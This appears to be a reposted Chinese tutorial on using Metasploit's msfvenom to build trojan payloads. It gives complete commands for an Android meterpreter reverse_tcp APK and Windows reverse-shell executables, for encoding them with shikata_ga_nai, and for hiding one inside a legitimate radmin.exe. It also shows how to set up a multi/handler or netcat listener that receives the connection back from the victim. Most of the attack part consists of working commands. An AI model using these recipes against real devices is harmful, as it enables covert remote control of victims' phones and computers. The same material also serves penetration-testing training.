zoukankan      html  css  js  c++  java
  • 6.Metasploit生成apk攻击Android实例

    Metasploit进阶第四讲 生成Android  apk文件

    01  msfvenom基本参数

    msfvenom介绍

    承接上回,staged/unstage payload如何利用?

    msfvenom是msfpayload及msfencode的结合体,可利用msfvenom将payload封装为木马程序,并在目标机上执行,在本地监听上线。

    msfvenom基本参数

    msfvenom  -h

    -p        ->指定payload

    -1        ->列出所有可用项

    -f         ->指定文件输出格式

    -e        ->指定编码格式

    -a        ->选择架构平台

    -o        ->选择文件输出路径,包含文件名

    -s         ->指定生成的payload最大大小

    -b        ->避免使用的字符

    -I         ->指定编码次数

    -c         ->添加自己的shellcode

    -xxxx.exc   -k    ->捆绑文件到xxx.cxc

    以下使用msfvenom分别是什么意思?

    Msfvenom   -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545

    -e x86/shikata_ga_nai –I 3 –f exe -o abc.exe

    Msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545

    -b ‘×00xff' –I 3 –f exe -o abc.exe

    Msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545

    -e x86/shikata_ga_nai –k –x /usr/share/windows-binaries/radmin.exe –f exe -o radmin.exe

    msfvenom生成apk文件

    staged payload:

    msfvenom -p android/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545

    R>/var/www/html/Lliang.apk

    metasploit:

    use exploit/multi/handler                  加载模块

    set payload android/meterpreter/reverse_tcp      选择Payload

    set LHOST10.1.1.169这里的地址设置成我

    们刚配置木马的IP地址

    set LPORT4545这里的端口设置成刚才我们

    配置木马所监听的端口

    unstage payload:

     

    msfvenom  –p  windows/shell_reverse_tcp LHOST=10.1.1.169 LPORT=4545

    -f exe –o /var/www/html/shell-stageless.exe

    metasploit:

    use exploit/multi/handler加载模块

    set payload windows/shell_reverse_tcp 选择Payload

    unstage payload:

    msfvenom  -p  windows/shell reverse_tcp LHOST=10.1.1.169 LPORT=4545     -f exe  -o  /var/www/html/shell-stageless.exe

     netcat:在两台电脑之润建立链接并返回两个数据流

    nc  -lyp  4545    -监听4545端口

    -v/-vw   显示指令执行过程

    -l  使用监听模式,管控传入的资料

    -p   设置本地主机使用的通信端口

    staged payload不适用于netcat,必须使用Metasploit的exploit/multi/handler模块。要从主机上的metasploit handler上下载完整的payload

  • 相关阅读:
    IDEA入门学习笔记1:资料收集
    嵌入式入门学习笔记3:[转]编译linux
    nrf51822微信开发2:[转]airkiss/airsync介绍
    nrf51822微信开发入门学习笔记1:开始前的准备
    Altium Designer入门学习笔记4:PCB设计中各层的含义
    简历包装1:[转]资料收集
    江苏省高等数学竞赛经验分享
    2017年高职高专技能比赛电子产品设计与制作赛项比赛经验分享
    2017年蓝桥杯单片机比赛经验分享
    蓝桥杯嵌入式比赛经验分享
  • 原文地址:https://www.cnblogs.com/lvwuwa/p/11129043.html
Copyright © 2011-2022 走看看